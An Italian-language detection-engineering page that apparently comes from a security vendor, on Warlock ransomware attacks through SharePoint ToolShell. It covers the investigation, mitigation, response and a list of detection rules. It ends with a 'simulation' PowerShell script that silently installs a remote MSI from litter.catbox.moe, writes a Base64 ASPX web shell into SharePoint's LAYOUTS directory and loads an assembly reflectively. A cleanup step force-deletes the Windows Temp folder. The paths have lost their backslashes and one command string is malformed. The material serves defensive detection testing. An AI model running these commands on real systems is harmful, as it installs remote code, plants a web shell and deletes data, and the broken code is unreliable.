Attacchi del ransomware Warlock contro infrastrutture critiche di acqua e telecomunicazioni
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un attore di minacce connesso alla Cina, monitorato come Longlegs, sta distribuendo il ransomware Warlock sfruttando le vulnerabilità di Microsoft SharePoint. Il gruppo utilizza una catena di exploit ToolShell per accedere inizialmente prima di muoversi lateralmente attraverso le reti compromesse. Gli attaccanti impiegano anche tecniche avanzate di evasione, inclusi l’abuso di driver vulnerabili per disabilitare il software di sicurezza e l’utilizzo di servizi cloud legittimi per la consegna del payload.
Indagine
L’indagine ha tracciato le attività dallo sfruttamento iniziale di SharePoint al dispiegamento di una webshell all’interno della directory LAYOUTS. Gli analisti hanno osservato l’uso di chiavi macchina ASP.NET falsificate per l’esecuzione di codice remoto e il ransomware preparato nella condivisione SYSVOL per la distribuzione a livello di dominio. La catena d’attacco ha coinvolto anche il caricamento di DLL e l’abuso della funzionalità di tunneling di Visual Studio Code per l’accesso persistente.
Mitigazione
Le organizzazioni dovrebbero dare priorità all’applicazione di patch su Microsoft SharePoint Server per risolvere le vulnerabilità conosciute di ToolShell. Applicare controlli rigorosi sui driver firmati ma vulnerabili può aiutare a prevenire attacchi BYOVD. I team di sicurezza dovrebbero anche monitorare l’uso anomalo di strumenti living-off-the-land e limitare l’accesso alla condivisione SYSVOL per attività non amministrative per ridurre il movimento laterale e il dispiegamento di ransomware.
Risposta
Quando viene rilevata un’attività malevola, i responder agli incidenti dovrebbero isolare i server SharePoint compromessi e ispezionare la condivisione SYSVOL alla ricerca di script o binari non autorizzati. Eseguire un controllo completo degli account di dominio, concentrandosi su aggiunte non autorizzate al gruppo Administrators locale. Rivedere il traffico di rete per connessioni in uscita verso servizi di condivisione file come catbox.moe o wasabisys.com utilizzati per la preparazione del payload.
Flusso di Attacco
Rilevamenti
Aggiungi Utente agli Amministratori Locali (via cmdline)
Scarica o Carica tramite Powershell (via cmdline)
Stringhe Powershell Sospette (via cmdline)
Chiama Classi/Metodi .NET Sospetti dal Comando Powershell (via process_creation)
Possibile Scoperta di Condivisioni di Rete (via cmdline)
Scoperta di Trust di Dominio Sospetti (via cmdline)
Possibile Tentativo di Installazione di File MSI Remoti (via cmdline)
Esecuzione Sospetta da Profilo Utente Pubblico (via process_creation)
Stringhe Powershell Sospette (via powershell)
Chiama Metodi .NET Sospetti da Powershell (via powershell)
Possibile Creazione di Webshell in Directory Microsoft Exchange/Sharepoint (via file_event)
File Sospetti in Profilo Utente Pubblico (via file_event)
Possibile Infiltrazione/Esfiltrazione Dati/C2 tramite Servizi/Tool di Terze Parti (via proxy)
Possibile Infiltrazione/Esfiltrazione Dati/C2 tramite Servizi/Tool di Terze Parti (via dns)
Comando e Controllo Sospetto mediante Richiesta a Dominio di Interazioni Out-of-Band (via dns)
IOC (HashSha256) per rilevare: Attaccanti del Ransomware Warlock Colpiscono Operatori Idrici e delle Telecomunicazioni
Rilevamento di Comando PowerShell Malevolo per Esecuzione di Codice [Windows Powershell]
Preparazione ed Esecuzione del Ransomware Warlock tramite Condivisioni di Rete [Evento di File Windows]
Indicatori di Ransomware Warlock su Server SharePoint [Creazione Processo Windows]
Esecuzione di Simulazione
Prerequisito: Il Controllo di Pre-volo Telemetria & Baseline deve essere superato.
Motivo: Questa sezione dettaglia l’esatta esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa & Comandi d’Attacco: L’avversario mira a distribuire il ransomware Warlock su un server SharePoint. L’attacco inizia utilizzando
msiexecper prelevare un MSI malevolo da un dominio controllato dagli attaccanti (catbox.moe). Seguito dell’iniziale appoggio, l’attaccante utilizza PowerShell per scrivere una web shell ASPX malevola nel percorso di SharePointlayout2sp.aspxutilizzando un payload codificato in Base64 per bypassare filtri semplici delle stringhe. Infine, l’attaccante tenta di caricare un’assembly .NET malevola direttamente in memoria utilizzandoSystem.Workflow.ComponentModelper eseguire codice senza lasciare un’impronta sul disco. -
Script di Test di Regressione:
# Script di Simulazione del Ransomware Warlock # NOTA: Questo script è solo per scopi di test autorizzati. Write-Host "[!] Avvio della Simulazione del Ransomware Warlock..." -ForegroundColor Red # 1. Simulazione Download Remoto MSIEXEC (Selezione 3) Write-Host "[*] Simulazione download payload remoto MSIEXEC..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simulazione Drop Web Shell ASPX tramite PowerShell (Selezione 1) # Utilizziamo la stringa esatta dalla regola per garantire il rilevamento Write-Host "[*] Simulazione drop web shell tramite Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simulazione Caricamento Riflettente Assembly (Selezione 2) Write-Host "[*] Simulazione di Caricamento Riflettente Assembly..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Comandi di simulazione inviati." -ForegroundColor Green -
Comandi di Pulizia:
# Script di pulizia per rimuovere eventuali artefatti creati durante la simulazione Write-Host "[!] Pulizia degli artefatti di simulazione..." -ForegroundColor Yellow # Rimuovere file simulati (Nota: In un test reale, si indirizzerebbero i percorsi specifici creati) # Poiché abbiamo usato stringhe fittizie, ci assicuriamo principalmente che non siano stati depositati file malevoli effettivi. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata." -ForegroundColor Green